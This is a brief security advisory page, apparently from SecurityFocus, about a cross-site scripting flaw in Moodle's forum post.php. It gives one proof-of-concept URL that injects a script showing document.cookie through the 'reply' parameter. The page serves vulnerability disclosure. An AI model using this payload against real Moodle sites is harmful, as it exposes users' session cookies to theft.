info
discussion
exploit
solution
references
Moodle 'post.php' Cross-Site Scripting Vulnerability
No exploit is required. A proof-of-concept example was provided:
http://www.example.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Privacy Statement
Copyright 2010, SecurityFocus
